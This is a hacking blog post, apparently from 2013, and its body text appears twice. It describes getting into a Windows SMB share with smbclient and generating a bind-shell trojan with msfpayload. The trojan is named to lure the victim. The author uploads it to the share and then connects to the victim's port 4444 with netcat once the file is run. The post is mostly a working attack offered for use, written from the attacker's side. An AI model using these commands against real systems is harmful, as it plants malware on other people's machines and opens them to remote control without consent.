Exploit Samba PART II "Trojan Uploaded"
before reading this post it helps you read the first post before http://h2-exploitation.blogspot.com/2013/10/exploit-samba-smbclient.html
in the post I have discussed how the attacker got access rights to the shared folder that utilize port 445.
in the previous post, the attacker can only access a folder, and the attacker is not permitted to see the Users folders, Windows, or other important folders.
so, in this post we will see how the attacker gain full access rights like an admin.
Equipments
1. Smbclient
2. Metasploit
3. Netcat
Connecting using SmbClient:
there are two files and one folder, but it can not satisfy me.
I further undertake manufacturing using Bind TCP payload:
after storing the payload in the Desktop directory, I disconnect from the host victim and then go into the Desktop directory and connect back
I did this so that later can upload the payload into the victim host :).
after connect back, then I upload the payload by using the command "mput" :
Done, Upload Success =))
The next what happens if the victim execute that file..???
Overview :
victims access the file, then open the way for us to enter =))
That's why I chose to manufacture Bind Tcp payload, so that the victim open port 4444 and I could get in as you wish =))
Best regards
Hidemichi-Hiroyuki a.k.a [H2]
in the post I have discussed how the attacker got access rights to the shared folder that utilize port 445.
in the previous post, the attacker can only access a folder, and the attacker is not permitted to see the Users folders, Windows, or other important folders.
so, in this post we will see how the attacker gain full access rights like an admin.
Equipments
1. Smbclient
2. Metasploit
3. Netcat
Connecting using SmbClient:
# smbclient //targetIP/Shared\ Folder -U ComputerName -p port [445]
there are two files and one folder, but it can not satisfy me.
I further undertake manufacturing using Bind TCP payload:
# msfpayload windows/shell_bind_tcp LHOST=myIP LPORT=portListening X > Desktop/Cantik.exe
after storing the payload in the Desktop directory, I disconnect from the host victim and then go into the Desktop directory and connect back
I did this so that later can upload the payload into the victim host :).
after connect back, then I upload the payload by using the command "mput" :
smb: \> mput Payload.exe
Done, Upload Success =))
The next what happens if the victim execute that file..???
Overview :
# nc victimIP port "4444"
victims access the file, then open the way for us to enter =))
That's why I chose to manufacture Bind Tcp payload, so that the victim open port 4444 and I could get in as you wish =))
Best regards
Hidemichi-Hiroyuki a.k.a [H2]
Comments
Post a Comment
Do Not Fuckin Spamming